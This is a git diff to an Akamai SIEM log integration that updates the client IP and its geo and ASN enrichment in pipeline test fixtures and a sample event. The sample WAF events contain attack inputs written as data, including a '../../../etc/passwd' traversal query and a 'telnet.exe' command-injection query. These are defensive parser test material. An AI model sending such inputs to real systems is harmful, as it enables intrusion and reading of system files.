gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} + {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R 
","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} + {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV 
VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} {"total":3,"offset":"abcd","limit":3} diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log index 116fc6180a1..838d5e98cff 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log 
@@ -1,3 +1,3 @@ -{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} -{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 
dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} +{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R 
","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} +{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV 
VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} {"total":10000,"offset":"71cca;3phZmEdPj6YEqml0rvbdWDZGW3mCiJIwjyhkJfsLFM2gVYPgE8-N_0CiLI9gwH0_4OJ87xDQ3b-gIsx_kEBdf7aaC_AvDpG9fMxypeaCma10FKrY9VKE","limit":10000} \ No newline at end of file diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json index 62a0e30999d..826f3717bd4 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json 
@@ -77,25 +77,25 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Virginia",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
- "number": 14618,
+ "number": 29518,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Bredband2 AB"
 }
 },
- "address": "52.91.36.10",
- "ip": "52.91.36.10"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "url": {
 "path": "/",
@@ -121,7 +121,7 @@
 },
 "related": {
 "ip": [
- "52.91.36.10"
+ "89.160.20.156"
 ]
 },
 "http": {
@@ -137,30 +137,30 @@ }, "client": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "52.91.36.10", - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { "start": "2017-04-04T10:57:02.000Z", - "ingested": "2021-12-08T14:29:59.364478822Z", - "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"52.91.36.10\",\"configId\":\"14227\",\"policyId\":\"qik1_26545\",\"ruleActions\":\"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d\",\"ruleData\":\"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX \",\"ruleMessages\":\"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 \",\"ruleSelectors\":\"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b\",\"ruleTags\":\"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R 
\",\"ruleVersions\":\"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d\",\"rules\":\"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ\"},\"geo\":{\"asn\":\"14618\",\"city\":\"ASHBURN\",\"continent\":\"288\",\"country\":\"US\",\"regionCode\":\"VA\"},\"httpMessage\":{\"bytes\":\"266\",\"host\":\"www.hmapi.com\",\"method\":\"GET\",\"path\":\"/\",\"port\":\"80\",\"protocol\":\"HTTP/1.1\",\"query\":\"option=com_jce%20telnet.exe\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"1158db1758e37bfe67b7c09\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150\",\"start\":\"1491303422\",\"status\":\"200\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", + "ingested": "2021-12-15T09:37:55.215803315Z", + "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"14227\",\"policyId\":\"qik1_26545\",\"ruleActions\":\"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d\",\"ruleData\":\"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX \",\"ruleMessages\":\"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 \",\"ruleSelectors\":\"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b\",\"ruleTags\":\"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R 
\",\"ruleVersions\":\"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d\",\"rules\":\"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ\"},\"geo\":{\"asn\":\"14618\",\"city\":\"ASHBURN\",\"continent\":\"288\",\"country\":\"US\",\"regionCode\":\"VA\"},\"httpMessage\":{\"bytes\":\"266\",\"host\":\"www.hmapi.com\",\"method\":\"GET\",\"path\":\"/\",\"port\":\"80\",\"protocol\":\"HTTP/1.1\",\"query\":\"option=com_jce%20telnet.exe\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"1158db1758e37bfe67b7c09\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150\",\"start\":\"1491303422\",\"status\":\"200\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", "id": "1158db1758e37bfe67b7c09", "category": "network", "kind": "event" 
@@ -233,25 +233,25 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Virginia",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
- "number": 14618,
+ "number": 29518,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Bredband2 AB"
 }
 },
- "address": "52.91.36.10",
- "ip": "52.91.36.10"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "url": {
 "path": "/examples/1/",
@@ -277,7 +277,7 @@
 },
 "related": {
 "ip": [
- "52.91.36.10"
+ "89.160.20.156"
 ]
 },
 "http": {
@@ -293,25 +293,25 @@
 },
 "client": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Virginia",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
- "number": 14618,
+ "number": 29518,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Bredband2 AB"
 }
 },
- "address": "52.91.36.10",
- "ip": "52.91.36.10"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "tls": {
 "version": "1.2",
@@ -319,8 +319,8 @@ }, "event": { "start": "2016-08-11T13:45:33.026Z", - "ingested": "2021-12-08T14:29:59.364485040Z", - "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"52.91.36.10\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\": \"TLSv1.2\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", + "ingested": "2021-12-15T09:37:55.215806647Z", + "original": 
"{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\": \"TLSv1.2\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", "id": "2ab418ac8515f33", "category": "network", "kind": "event" diff --git a/packages/akamai/data_stream/siem/sample_event.json b/packages/akamai/data_stream/siem/sample_event.json index 509feb14af8..31614bc2fa6 100644 --- a/packages/akamai/data_stream/siem/sample_event.json +++ b/packages/akamai/data_stream/siem/sample_event.json 
@@ -73,26 +73,26 @@
 }
 },
 "client": {
- "address": "52.91.36.10",
+ "geo": {
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
+ "location": {
+ "lon": 15.6167,
+ "lat": 58.4167
+ }
+ },
 "as": {
- "number": 14618,
+ "number": 29518,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Bredband2 AB"
 }
 },
- "geo": {
- "city_name": "Ashburn",
- "continent_name": "North America",
- "country_iso_code": "US",
- "country_name": "United States",
- "location": {
- "lat": 39.0481,
- "lon": -77.4728
- },
- "region_iso_code": "US-VA",
- "region_name": "Virginia"
- },
- "ip": "52.91.36.10"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "data_stream": {
 "dataset": "akamai.siem",
